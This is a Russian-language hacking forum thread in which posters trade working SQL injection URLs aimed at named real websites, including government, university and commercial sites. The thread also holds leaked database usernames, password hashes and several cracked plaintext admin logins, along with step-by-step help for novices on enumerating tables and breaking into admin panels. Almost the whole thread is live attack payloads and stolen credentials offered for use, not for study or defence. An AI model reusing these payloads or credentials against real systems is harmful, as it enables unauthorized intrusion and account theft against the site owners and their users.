SQL Инъекции

http://www.psyplanet.ru/admin/
Tester
1111

 

Code:

http://www.biosmagazine.co.uk/press-release.php?id=-8570+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16/*
http://www.lincstrust.org.uk/news/press-release.php?article=-87+union+select+1,2,user(),version(),5,6,7/*
http://www.stargallery.co.uk/dmx-release.php?release=-36+union+select+user(),2,version()/*
http://www.alt.ac.uk/news_detail.php?nid=-113+union+select+1,version(),3,user(),5,6/*

 

эту раскрутить не смог

Code:

http://www.mvd.uz/index.php?action=news&nid=&nwid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12&type=1

А вот тут, логиница в админку можно, только с определенных ip адресов, адреса все лежат в iis ((

Code:

http://www.tfi.uz/?page=news&info=full&idCode=164'+union+select+top+1+1,username+from+users--

 

епть ты хоть сморишь куда лезешь

Code:

http://www.dsk1ko.ru/dsk1ko/pricelist/ApartmentList/default.aspx?ID=-1+unon+select+1,version(),3,4/*

 

http://www.y12.doe.gov/

Code:

http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,user(),3,4,version(),6,password,8,9,10+from+mysql.user/*

User: y12admin
Password:*B239D061C8CD910D991D58C252274C9DABA049B9 (чё это за хеш? SHA?)
http://www.smoothwall.ltd.uk/

Code:

http://www.smoothwall.ltd.uk/support/knowledge/view.php?id=-42+union+select+1,user(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

 

а что , я ничего, вообще ничего не сделал ))

Code:

http://www.groundhigh.com/cpCommerce/category.php?id_category=-1+union+select+1,concat(email,0x3a,pass),3,4+from+cpAccounts+where+level=3/*

[email protected]:make1ts0

 

Code:

http://www.dukemednews.com/news/article.php?id=-9979+union+select+user,2,3,4,5,password,7,8+from+mysql.user/*

root:623460e26f081bbc + еще имееться усеры

Code:

http://www.dcresource.com/news/newsitem.php?id=-3436+union+select+1,2,user(),database(),5,6,7,8,9/*

Ky3bMu4 http://www.y12.doe.gov/ уже есть...

 

ООО «Столовое серебро»

Code:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,5,6/*

USER: silverspoons@localhost
DATABASE: silverspoons
VERSION: 4.1.7

Не знаю как узнать имена таблиц

 

Code:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,concat(name,0x3a,pass),6+from+users/*

boa:b5ecf32b4295a600b9f49f290aa3d55e
boauser:526840b891f4b4fb0dc7ce8a5fb98426
юрик:159ca38bb232c9433f3fe892fc1578da

итд, там таких много )), щас попробуем хэши пробить.

ps вот boa:boass
pps админ по ходу юрик:yurik

 

Code:

http://www.uyghurinfo.net/index.php?cc=6&sc=0+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

подбирать таблицы лень

 

Помогите пожалуйста. Я вот с Sql не очень и такой вопрос:

Code:

http://www.southrussian.ru/dog.php?id=882'

вот здесь вылазит ошибка mysql_fetch_array() потом я пытался подобрать столбцы используя, как учили, uinion select. Так я дошел до 20 и ничего не происходит. Так вот что мне делать?) Еще я где то читал про использование order by для определения количества столбцов. Расскажите пожалуста.

 

CRL, http://www.southrussian.ru/dog.php?id=-1+union+select+version(),2,3,4,5,6/*

http://www.southrussian.ru/dog.php?id=-1+union+select+concat(name,0x3a,password),2,3,4,5,6+from+users/*

 

Спасибо) У меня появился тогда еще вопрос(последний)
http://prospectus.ulster.ac.uk/course/?id=2435+UNION+select+1,2,3/*
Здесь подобрал а дальше не могу придумать, просто я совсем растение в sql.

Добавлено
На сайте про собак (southrussian.ru) логин ADMIN и пароль 123456

 

Нужно перейти к несуществующим значениям ID, т.е -2435
и подобрать имя таблицы

Code:

http://prospectus.ulster.ac.uk/course/?id=-2435+UNION+select+1,2,3+from+user/*

 

forum.sunrise.ru

Code:

[COLOR=DarkOrange]http://forum.sunrise.ru/forum.asp?FORUM_ID=36+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('jiaozhu','FORUM_REPLY','FORUM_TOPICS','t_jiaozhu','FORUM_MODERATOR','FORUM_ALLOWED_MEMBERS','dtproperties','FORUM_TOTALS','FORUM_CATEGORY','FORUM_MEMBERS','FORUM_FORUM','FORUM_CONFIG'))--[/COLOR]

Yfi4hevSMS:Admin
админка:

Code:

[COLOR=DarkOrange]http://forum.sunrise.ru/admin_login.asp[/COLOR]

mmis.umt.edu

Code:

[COLOR=DarkOrange]http://mmis.umt.edu/CCFacil.asp?cName=Missoula&Type=County&Number=4'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('m_LogBuySpecies','syssegments','sysconstraints','m_LogBuy','ca_history','ca_holding','ca_lendar','ca_eventtype','dtproperties','ca_topictype','m_Activities','cm_city','m_BBER','m_changeLog','m_contacts','m_contacttype','m_EvalSurvey','m_CURFORMailList','m_equipprocess','m_facil_hold','m_contacts_hold','m_facilprod','m_inputdist','m_groups','m_LogPriceMailList','m_NAICS','m_Outlook03','m_outputdist','m_PrimBus','m_inputs','m_prod_hold','m_products','m_productstatus','m_SecondaryWoodSurvey2005','m_facility','m_SpecialtyLogMailList','m_vwcertNameAbbrev','m_TechList','m_vwcerts','m_VWCONTACTS','m_vwequipprocess','m_vwfacility','m_vwfacilprod','m_VWForAccess','m_vwinputs','m_SIC','m_vwLogBuySpecies','m_vwlogbuy','m_vwTechList','mf_globals','mID_vwContacts','mID_vwfacilprod','r_db','mID_vwfacility','r_orgtype','r_keywords','r_vwdb','m_SenateFinance1','r_services','m_certs','cm_county'))--[/COLOR]

chslovo.com

Code:

[COLOR=DarkOrange]http://www.chslovo.com/include/output_articles.asp?Id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('articles','Ans','Que','Site_Articles','Site_Articles1','Site_Forum_A_TOPICS','Site_Forum_ALLOWED_MEMBERS','Site_Forum_CATEGORY','Site_Forum_CONFIG_NEW','Site_Forum_FORUM','Site_Forum_A_REPLY','Site_Forum_GROUPS','Site_Forum_GROUP_NAMES','Site_Forum_MEMBERS','Site_Forum_MEMBERS_PENDING','Site_Forum_MODERATOR','Site_Forum_REPLY','Quiz','Site_Forum_SUBSCRIPTIONS','Site_Forum_TOPICS','Site_Forum_TOTALS','Site_Numbers','Site_numbers1','Site_Rubrics','Site_Pictures','Site_Users','Site_Users_Conf','Site_Texts','Site_Users_Privs','Site_Users_Emails','View_Adv_Search','sysconstraints','syssegments','t_jiaozhu','D99_Tmp','dtproperties'))--[/COLOR]

admin:ghjcnjnfr

посл. вывод вывод в ссылке:

Code:

[COLOR=DarkOrange]http://webmascon.com/archive/topic.asp?id=-1+union+select+1,2,3,version(),database(),6,user()/*[/COLOR]

 

http://www.tehorng.com/

Code:

http://www.tehorng.com/release.php?release=-11959+union+select+1,2,3,4,user(),password,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26+from+mysql.user/*

User:tehorng
Password(хеш): *5837662AE1DB0E6C8864BF4F5F3600EA202395E1

http://www.gamerevolution.com

Code:

http://www.gamerevolution.com/manifesto/view.php?id=-264+union+select+1,2,user(),version(),5,6,7,8,9,10,11/*

 

Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log

Code:

http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*

А вот еще

Code:

http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*

Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки.

 

databse: nuke
version: 4.1.20-log
user: root
pass: *D4BBC2141A32BB10BC1641424058A822737B0876

Code:

http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,database(),version(),user(),password+from+mysql.user

 

Code:

http://www.tyndall.ac.uk/generate/staffprint/staff-view.php?id=-1+UNION+SELECT+1,2,3,4/*

Code:

http://gopanthers.fit.edu/sports_info/view.php?id=-11+UNION+SELECT+1,2,3,4/*

Code:

http://www.ecodefense.ru/view.php?id=-431+ORDER+BY+11/*

Code:

http://www.tam.ca.gov/view.php?id=-14+UNION+SELECT+1,2,3,4/*

Code:

http://www.b-connect.ru/view.php?cid=111'

просто ошыбка, ищо непроверял на инж. если есть иекцыя то можно будет посидень на чужом компе=)

http://www.ccp-austria.at/view.php?id=52'
Notice: Undefined offset: 0 in D:\Inetpub\wwwroot\www.ccp-austria.at\view.php on line 213

 

Сайты кланов Великой игры , КОМБАТСРУ

Чем паролики зашифрованы ? MD4 (base64) ??

и ещё

Edited by ice1k:
- не стоило писать 7ым размером шрифта: "Сайты кланов Великой игры , КОМБАТСРУ" - это всего лишь сайт отдельного клана.